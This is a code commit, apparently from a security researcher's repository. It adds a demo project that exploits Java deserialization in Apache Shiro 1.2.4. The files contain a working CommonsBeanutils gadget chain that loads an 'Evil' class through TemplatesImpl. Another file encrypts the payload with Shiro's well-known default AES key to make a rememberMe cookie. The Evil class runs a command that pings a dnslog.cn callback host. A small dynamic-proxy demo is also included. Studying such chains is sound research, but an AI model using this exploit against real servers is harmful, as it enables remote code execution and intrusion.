gadget

Author: SummerSec

shiro/shiro-cb/pom.xml

@@ -0,0 +1,96 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<parent>
+		<groupId>org.springframework.boot</groupId>
+		<artifactId>spring-boot-starter-parent</artifactId>
+		<version>2.5.1-SNAPSHOT</version>
+		<relativePath/> <!-- lookup parent from repository -->
+	</parent>
+	<groupId>com.summersec</groupId>
+	<artifactId>cb</artifactId>
+	<version>0.0.1-SNAPSHOT</version>
+	<name>cb</name>
+	<description>Demo project for CommonsBeanutils In Shiro</description>
+	<properties>
+		<java.version>1.8</java.version>
+	</properties>
+	<dependencies>
+		<dependency>
+			<groupId>org.springframework.boot</groupId>
+			<artifactId>spring-boot-starter-web</artifactId>
+		</dependency>
+		<dependency>
+			<groupId>org.springframework.boot</groupId>
+			<artifactId>spring-boot-starter-test</artifactId>
+			<scope>test</scope>
+		</dependency>
+		<dependency>
+			<groupId>org.javassist</groupId>
+			<artifactId>javassist</artifactId>
+			<version>3.27.0-GA</version>
+		</dependency>
+<!--		<dependency>-->
+<!--			<groupId>commons-beanutils</groupId>-->
+<!--			<artifactId>commons-beanutils</artifactId>-->
+<!--			<version>1.9.2</version>-->
+<!--		</dependency>-->
+		<dependency>
+			<groupId>org.apache.shiro</groupId>
+			<artifactId>shiro-spring</artifactId>
+			<version>1.2.4</version>
+		</dependency>
+		<dependency>
+			<groupId>org.apache.shiro</groupId>
+			<artifactId>shiro-web</artifactId>
+			<version>1.2.4</version>
+		</dependency>
+	</dependencies>
+
+	<build>
+		<plugins>
+			<plugin>
+				<groupId>org.springframework.boot</groupId>
+				<artifactId>spring-boot-maven-plugin</artifactId>
+			</plugin>
+		</plugins>
+	</build>
+	<repositories>
+		<repository>
+			<id>spring-milestones</id>
+			<name>Spring Milestones</name>
+			<url>https://repo.spring.io/milestone</url>
+			<snapshots>
+				<enabled>false</enabled>
+			</snapshots>
+		</repository>
+		<repository>
+			<id>spring-snapshots</id>
+			<name>Spring Snapshots</name>
+			<url>https://repo.spring.io/snapshot</url>
+			<releases>
+				<enabled>false</enabled>
+			</releases>
+		</repository>
+	</repositories>
+	<pluginRepositories>
+		<pluginRepository>
+			<id>spring-milestones</id>
+			<name>Spring Milestones</name>
+			<url>https://repo.spring.io/milestone</url>
+			<snapshots>
+				<enabled>false</enabled>
+			</snapshots>
+		</pluginRepository>
+		<pluginRepository>
+			<id>spring-snapshots</id>
+			<name>Spring Snapshots</name>
+			<url>https://repo.spring.io/snapshot</url>
+			<releases>
+				<enabled>false</enabled>
+			</releases>
+		</pluginRepository>
+	</pluginRepositories>
+
+</project>

shiro/shiro-cb/src/main/java/com/summersec/cb/LazyMap/ExampleApp.java

@@ -0,0 +1,24 @@
+package com.summersec.cb.LazyMap;
+
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.HashMap;
+import java.util.Map;
+/**
+ * @ClassName: ExampleApp
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/5/25 16:43
+ * @Version: v1.0.0
+ * @Description: Java动态代理
+ **/
+
+public class ExampleApp {
+    public static void main(String[] args) throws Exception {
+        InvocationHandler handler = new ExampleInvocationHandler(new HashMap());
+        Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);
+        proxyMap.put("hello", "world");
+        String result = (String) proxyMap.get("hello");
+        System.out.println(result);
+    }
+}

shiro/shiro-cb/src/main/java/com/summersec/cb/LazyMap/ExampleInvocationHandler.java

@@ -0,0 +1,29 @@
+package com.summersec.cb.LazyMap;
+
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+import java.util.Map;
+
+/**
+ * @ClassName: ExampleInvocationHandler
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/5/25 16:39
+ * @Version: v1.0.0
+ * @Description: 动态代理修改值
+ **/
+public class ExampleInvocationHandler implements InvocationHandler {
+    protected Map map;
+    public ExampleInvocationHandler(Map map) {
+        this.map = map;
+    }
+    // 修改hello对应的值
+    @Override
+    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
+        if (method.getName().compareTo("get") == 0) {
+            System.out.println("Hook method: " + method.getName());
+            return "Hacked Object";
+        }
+        return method.invoke(this.map, args);
+    }
+}

shiro/shiro-cb/src/main/java/com/summersec/cb/payload/CommonsBeanutils.java

@@ -0,0 +1,57 @@
+package com.summersec.cb.payload;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.math.BigInteger;
+import java.util.PriorityQueue;
+
+/**
+ * @ClassName: CommonsBeanutils
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/5/23 10:36
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class CommonsBeanutils {
+    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+        Field field = obj.getClass().getDeclaredField(fieldName);
+        field.setAccessible(true);
+        field.set(obj, value);
+    }
+
+    public static void main(String[] args) throws Exception {
+        TemplatesImpl obj = new TemplatesImpl();
+        setFieldValue(obj, "_bytecodes", new byte[][]{
+                ClassPool.getDefault().get(Evil.class.getName()).toBytecode()
+        });
+        setFieldValue(obj, "_name", "HelloTemplatesImpl");
+        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+        final BeanComparator comparator = new BeanComparator();
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+        // stub data for replacement later
+        queue.add(1);
+        queue.add(1);
+
+        setFieldValue(comparator, "property", "outputProperties");
+        setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+
+        System.out.println(barr);
+        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+        Object o = (Object)ois.readObject();
+    }
+}

shiro/shiro-cb/src/main/java/com/summersec/cb/payload/CommonsBeanutils1Shiro.java

@@ -0,0 +1,91 @@
+package com.summersec.cb.payload;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.logging.log4j.util.PropertySource;
+import org.apache.shiro.crypto.AesCipherService;
+import org.apache.shiro.util.ByteSource;
+
+/**
+ * @ClassName: CommonsBeanutils1Shiro
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/5/19 16:23
+ * @Version: v1.0.0
+ * @Description: 参考https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
+ **/
+
+
+public class CommonsBeanutils1Shiro {
+
+    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+        Field field = obj.getClass().getDeclaredField(fieldName);
+        field.setAccessible(true);
+        field.set(obj, value);
+    }
+
+    public byte[] getPayload(byte[] clazzBytes) throws Exception {
+        TemplatesImpl obj = new TemplatesImpl();
+        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
+        setFieldValue(obj, "_name", "HelloTemplatesImpl");
+        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+        PropertySource propertySource1 = new PropertySource() {
+            @Override
+            public int getPriority() {
+                return 0;
+            }
+        };
+        PropertySource propertySource2 = new PropertySource() {
+            @Override
+            public int getPriority() {
+                return 0;
+            }
+        };
+
+//        final PropertySource propertySource = PropertySource.Comparator;
+
+        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+//        final BeanComparator comparator = new BeanComparator(null, new PropertySource.Comparator());
+        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
+        // stub data for replacement later
+        queue.add("1");
+        queue.add("1");
+//        queue.add(propertySource1);
+//        queue.add(propertySource2);
+
+        setFieldValue(comparator, "property", "outputProperties");
+        setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+        // ==================
+        // 生成序列化字符串
+        ByteArrayOutputStream barr = new ByteArrayOutputStream();
+        ObjectOutputStream oos = new ObjectOutputStream(barr);
+        oos.writeObject(queue);
+        oos.close();
+
+        return barr.toByteArray();
+    }
+
+    public static void main(String[] args) throws Exception {
+        ClassPool pool = ClassPool.getDefault();
+        CtClass clazz = pool.get(Evil.class.getName());
+//        byte[] bytes = Evil.class.getName().getBytes();
+//        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(bytes);
+        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
+
+        AesCipherService aes = new AesCipherService();
+        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
+
+        ByteSource ciphertext = aes.encrypt(payloads, key);
+        System.out.printf(ciphertext.toString());
+    }
+
+}

shiro/shiro-cb/src/main/java/com/summersec/cb/payload/Evil.java

@@ -0,0 +1,29 @@
+package com.summersec.cb.payload;
+
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+/**
+ * @ClassName: Evil
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/5/19 16:34
+ * @Version: v1.0.0
+ * @Description:
+ **/
+
+
+public class Evil extends AbstractTranslet {
+    @Override
+    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
+
+    @Override
+    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
+
+    public Evil() throws Exception {
+        System.out.println("Hello TemplatesImpl");
+        Runtime.getRuntime().exec("ping asdaqwe.6klua6.dnslog.cn");
+    }
+}